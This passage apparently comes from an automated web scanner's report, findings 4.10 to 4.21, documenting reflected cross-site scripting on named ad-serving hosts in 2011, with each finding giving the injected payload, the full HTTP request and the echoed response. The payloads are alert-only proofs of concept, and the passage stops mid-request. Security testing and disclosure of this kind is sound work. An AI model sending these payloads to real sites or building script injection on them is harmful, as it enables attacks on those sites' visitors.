4.10. http://ad.doubleclick.net/adj/N5763.288148.ADRX/B5223690.13 [forced_click parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5763.288148.ADRX/B5223690.13

Issue detail

The value of the forced_click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload edfb9'-alert(1)-'02371f85c62 was submitted in the forced_click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5763.288148.ADRX/B5223690.13;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=306564&mid=572017&m=6&sid=56553&c=0&tp=8&forced_click=edfb9'-alert(1)-'02371f85c62 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.redorbit.com/news/business/1993118/spil_games_selects_adyens_internet_payment_system_for_global_social/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5856
Cache-Control: no-cache
Pragma: no-cache
Date: Fri, 24 Jun 2011 13:32:42 GMT
Expires: Fri, 24 Jun 2011 13:32:42 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Jun 01 19:55:26 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
b30/7/7e/%2a/z%3B241862722%3B1-0%3B0%3B64680757%3B4307-300/250%3B40675268/40693055/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=306564&mid=572017&m=6&sid=56553&c=0&tp=8&forced_click=edfb9'-alert(1)-'02371f85c62http://www.renu.com/coupons.html?utm_source=adrx&utm_medium=banner&utm_campaign=renu_2011\">
...[SNIP]...

4.11. http://ad.doubleclick.net/adj/N5763.288148.ADRX/B5223690.13 [m parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5763.288148.ADRX/B5223690.13

Issue detail

The value of the m request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9fc1a"-alert(1)-"5e22fb0853e was submitted in the m parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5763.288148.ADRX/B5223690.13;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=306564&mid=572017&m=69fc1a"-alert(1)-"5e22fb0853e&sid=56553&c=0&tp=8&forced_click=;ord=20110624132648? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.redorbit.com/news/business/1993118/spil_games_selects_adyens_internet_payment_system_for_global_social/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5917
Date: Fri, 24 Jun 2011 13:32:04 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Jun 01 19:58:18 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
.doubleclick.net/click%3Bh%3Dv8/3b30/f/7e/%2a/y%3B241862722%3B0-0%3B0%3B64680757%3B4307-300/250%3B40599384/40617171/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=306564&mid=572017&m=69fc1a"-alert(1)-"5e22fb0853e&sid=56553&c=0&tp=8&forced_click=http%3a%2f%2fwww.renu.com/coupons.html%3Futm_source%3Dadrx%26utm_medium%3Dbanner%26utm_campaign%3Drenu_2011");
var fscUrl = url;
var fscUrlClickTagFound = false;
var
...[SNIP]...

4.12. http://ad.doubleclick.net/adj/N5763.288148.ADRX/B5223690.13 [m parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5763.288148.ADRX/B5223690.13

Issue detail

The value of the m request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 57236'-alert(1)-'8e38fa4225c was submitted in the m parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5763.288148.ADRX/B5223690.13;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=306564&mid=572017&m=657236'-alert(1)-'8e38fa4225c&sid=56553&c=0&tp=8&forced_click=;ord=20110624132648? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.redorbit.com/news/business/1993118/spil_games_selects_adyens_internet_payment_system_for_global_social/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5910
Date: Fri, 24 Jun 2011 13:32:08 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Jun 01 19:55:26 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
.doubleclick.net/click%3Bh%3Dv8/3b30/f/7e/%2a/z%3B241862722%3B1-0%3B0%3B64680757%3B4307-300/250%3B40675268/40693055/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=306564&mid=572017&m=657236'-alert(1)-'8e38fa4225c&sid=56553&c=0&tp=8&forced_click=http%3a%2f%2fwww.renu.com/coupons.html%3Futm_source%3Dadrx%26utm_medium%3Dbanner%26utm_campaign%3Drenu_2011\">
...[SNIP]...

4.13. http://ad.doubleclick.net/adj/N5763.288148.ADRX/B5223690.13 [mid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5763.288148.ADRX/B5223690.13

Issue detail

The value of the mid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e8156"-alert(1)-"c271489ca7 was submitted in the mid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5763.288148.ADRX/B5223690.13;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=306564&mid=572017e8156"-alert(1)-"c271489ca7&m=6&sid=56553&c=0&tp=8&forced_click=;ord=20110624132648? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.redorbit.com/news/business/1993118/spil_games_selects_adyens_internet_payment_system_for_global_social/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5906
Date: Fri, 24 Jun 2011 13:31:55 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Jun 01 19:55:26 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
//ad.doubleclick.net/click%3Bh%3Dv8/3b30/f/7d/%2a/z%3B241862722%3B1-0%3B0%3B64680757%3B4307-300/250%3B40675268/40693055/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=306564&mid=572017e8156"-alert(1)-"c271489ca7&m=6&sid=56553&c=0&tp=8&forced_click=http%3a%2f%2fwww.renu.com/coupons.html%3Futm_source%3Dadrx%26utm_medium%3Dbanner%26utm_campaign%3Drenu_2011");
var fscUrl = url;
var fscUrlClickTagFound = false;
...[SNIP]...

4.14. http://ad.doubleclick.net/adj/N5763.288148.ADRX/B5223690.13 [mid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5763.288148.ADRX/B5223690.13

Issue detail

The value of the mid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ce438'-alert(1)-'17c1f71f23 was submitted in the mid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5763.288148.ADRX/B5223690.13;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=306564&mid=572017ce438'-alert(1)-'17c1f71f23&m=6&sid=56553&c=0&tp=8&forced_click=;ord=20110624132648? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.redorbit.com/news/business/1993118/spil_games_selects_adyens_internet_payment_system_for_global_social/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5913
Date: Fri, 24 Jun 2011 13:31:59 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Jun 01 19:58:18 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
//ad.doubleclick.net/click%3Bh%3Dv8/3b30/f/7d/%2a/y%3B241862722%3B0-0%3B0%3B64680757%3B4307-300/250%3B40599384/40617171/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=306564&mid=572017ce438'-alert(1)-'17c1f71f23&m=6&sid=56553&c=0&tp=8&forced_click=http%3a%2f%2fwww.renu.com/coupons.html%3Futm_source%3Dadrx%26utm_medium%3Dbanner%26utm_campaign%3Drenu_2011\">
...[SNIP]...

4.15. http://ad.doubleclick.net/adj/N5763.288148.ADRX/B5223690.13 [sid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5763.288148.ADRX/B5223690.13

Issue detail

The value of the sid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b0882'-alert(1)-'351f198fca4 was submitted in the sid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5763.288148.ADRX/B5223690.13;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=306564&mid=572017&m=6&sid=56553b0882'-alert(1)-'351f198fca4&c=0&tp=8&forced_click=;ord=20110624132648? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.redorbit.com/news/business/1993118/spil_games_selects_adyens_internet_payment_system_for_global_social/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5917
Date: Fri, 24 Jun 2011 13:32:16 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Jun 01 19:58:18 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
ck.net/click%3Bh%3Dv8/3b30/f/7e/%2a/y%3B241862722%3B0-0%3B0%3B64680757%3B4307-300/250%3B40599384/40617171/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=306564&mid=572017&m=6&sid=56553b0882'-alert(1)-'351f198fca4&c=0&tp=8&forced_click=http%3a%2f%2fwww.renu.com/coupons.html%3Futm_source%3Dadrx%26utm_medium%3Dbanner%26utm_campaign%3Drenu_2011\">
...[SNIP]...

4.16. http://ad.doubleclick.net/adj/N5763.288148.ADRX/B5223690.13 [sid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5763.288148.ADRX/B5223690.13

Issue detail

The value of the sid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aefe1"-alert(1)-"70048dfceb8 was submitted in the sid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5763.288148.ADRX/B5223690.13;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=306564&mid=572017&m=6&sid=56553aefe1"-alert(1)-"70048dfceb8&c=0&tp=8&forced_click=;ord=20110624132648? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.redorbit.com/news/business/1993118/spil_games_selects_adyens_internet_payment_system_for_global_social/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5910
Date: Fri, 24 Jun 2011 13:32:12 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Jun 01 19:55:26 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
ck.net/click%3Bh%3Dv8/3b30/f/7e/%2a/z%3B241862722%3B1-0%3B0%3B64680757%3B4307-300/250%3B40675268/40693055/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=306564&mid=572017&m=6&sid=56553aefe1"-alert(1)-"70048dfceb8&c=0&tp=8&forced_click=http%3a%2f%2fwww.renu.com/coupons.html%3Futm_source%3Dadrx%26utm_medium%3Dbanner%26utm_campaign%3Drenu_2011");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "
...[SNIP]...

4.17. http://ad.doubleclick.net/adj/N5763.288148.ADRX/B5223690.13 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5763.288148.ADRX/B5223690.13

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload da161'-alert(1)-'636ccbb15bb was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5763.288148.ADRX/B5223690.13;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=306564da161'-alert(1)-'636ccbb15bb&mid=572017&m=6&sid=56553&c=0&tp=8&forced_click=;ord=20110624132648? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.redorbit.com/news/business/1993118/spil_games_selects_adyens_internet_payment_system_for_global_social/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5910
Date: Fri, 24 Jun 2011 13:31:51 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Jun 01 19:55:26 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
ref=\"http://ad.doubleclick.net/click%3Bh%3Dv8/3b30/f/7e/%2a/z%3B241862722%3B1-0%3B0%3B64680757%3B4307-300/250%3B40675268/40693055/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=306564da161'-alert(1)-'636ccbb15bb&mid=572017&m=6&sid=56553&c=0&tp=8&forced_click=http%3a%2f%2fwww.renu.com/coupons.html%3Futm_source%3Dadrx%26utm_medium%3Dbanner%26utm_campaign%3Drenu_2011\">
...[SNIP]...

4.18. http://ad.doubleclick.net/adj/N5763.288148.ADRX/B5223690.13 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5763.288148.ADRX/B5223690.13

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 38004"-alert(1)-"6e5cb2d63c0 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5763.288148.ADRX/B5223690.13;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=30656438004"-alert(1)-"6e5cb2d63c0&mid=572017&m=6&sid=56553&c=0&tp=8&forced_click=;ord=20110624132648? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.redorbit.com/news/business/1993118/spil_games_selects_adyens_internet_payment_system_for_global_social/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5910
Date: Fri, 24 Jun 2011 13:31:46 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Jun 01 19:55:26 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
cape("http://ad.doubleclick.net/click%3Bh%3Dv8/3b30/f/7e/%2a/z%3B241862722%3B1-0%3B0%3B64680757%3B4307-300/250%3B40675268/40693055/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=30656438004"-alert(1)-"6e5cb2d63c0&mid=572017&m=6&sid=56553&c=0&tp=8&forced_click=http%3a%2f%2fwww.renu.com/coupons.html%3Futm_source%3Dadrx%26utm_medium%3Dbanner%26utm_campaign%3Drenu_2011");
var fscUrl = url;
var fscUrlClickTagFoun
...[SNIP]...

4.19. http://ad.doubleclick.net/adj/N5763.288148.ADRX/B5223690.13 [tp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5763.288148.ADRX/B5223690.13

Issue detail

The value of the tp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4bcde"-alert(1)-"e30639d2e6f was submitted in the tp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5763.288148.ADRX/B5223690.13;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=306564&mid=572017&m=6&sid=56553&c=0&tp=84bcde"-alert(1)-"e30639d2e6f&forced_click=;ord=20110624132648? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.redorbit.com/news/business/1993118/spil_games_selects_adyens_internet_payment_system_for_global_social/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5917
Date: Fri, 24 Jun 2011 13:32:29 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Jun 01 19:58:18 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
ick%3Bh%3Dv8/3b30/f/7e/%2a/y%3B241862722%3B0-0%3B0%3B64680757%3B4307-300/250%3B40599384/40617171/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=306564&mid=572017&m=6&sid=56553&c=0&tp=84bcde"-alert(1)-"e30639d2e6f&forced_click=http%3a%2f%2fwww.renu.com/coupons.html%3Futm_source%3Dadrx%26utm_medium%3Dbanner%26utm_campaign%3Drenu_2011");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
...[SNIP]...

4.20. http://ad.doubleclick.net/adj/N5763.288148.ADRX/B5223690.13 [tp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5763.288148.ADRX/B5223690.13

Issue detail

The value of the tp request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8fc56'-alert(1)-'5155e46d14c was submitted in the tp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N5763.288148.ADRX/B5223690.13;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=306564&mid=572017&m=6&sid=56553&c=0&tp=88fc56'-alert(1)-'5155e46d14c&forced_click=;ord=20110624132648? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.redorbit.com/news/business/1993118/spil_games_selects_adyens_internet_payment_system_for_global_social/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5910
Date: Fri, 24 Jun 2011 13:32:33 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Wed Jun 01 19:55:26 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
ick%3Bh%3Dv8/3b30/f/7e/%2a/z%3B241862722%3B1-0%3B0%3B64680757%3B4307-300/250%3B40675268/40693055/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=306564&mid=572017&m=6&sid=56553&c=0&tp=88fc56'-alert(1)-'5155e46d14c&forced_click=http%3a%2f%2fwww.renu.com/coupons.html%3Futm_source%3Dadrx%26utm_medium%3Dbanner%26utm_campaign%3Drenu_2011\">
...[SNIP]...

4.21. http://ar.voicefive.com/b/rc.pli [func parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/rc.pli

Issue detail

The value of the func request parameter is copied into the HTML document as plain text between tags. The payload 3a324<script>alert(1)</script>ae0e732eb9f was submitted in the func parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /b/rc.pli?func=COMSCORE.BMX.Broker.handleInteraction3a324<script>alert(1)</script>ae0e732eb9f&n=ar_int_p97174789&1308922038899 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://www.gamersdailynews.com/story-21533-40-of-Internet-Users-Play-Casual-Games-Says-Spil.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&; ar_p85001580=exp=1&initExp=Thu Jun 16 14:08:59 2011&recExp=Thu Jun 16 14:08:59 2011&prad=62126627&arc=42474885&; ar_p45555483=exp=1&initExp=Thu Jun 16 18:27:25 2011&recExp=Thu Jun 16 18:27:25 2011&prad=64578880&arc=36816991&; ar_p104939219=exp=1&initExp=Sun Jun 19 22:38:12 2011&recExp=Sun Jun 19 22:38:12 2011&prad=9007&cpn4=1&arc=97&; ar_p90452457=exp=3&initExp=Fri Jun 17 15:21:04 2011&recExp=Mon Jun 20 16:57:27 2011&prad=310146149&arc=222480638&; ar_p82806590=exp=7&initExp=Sat May 21 12:32:31 2011&recExp=Thu Jun 23 22:13:14 2011&prad=62872914&arc=42476438&; ar_p97174789=exp=14&initExp=Tue May 17 20:12:51 2011&recExp=Fri Jun 24 13:26:47 2011&prad=242390407&arc=206438376&; BMX_3PC=1; 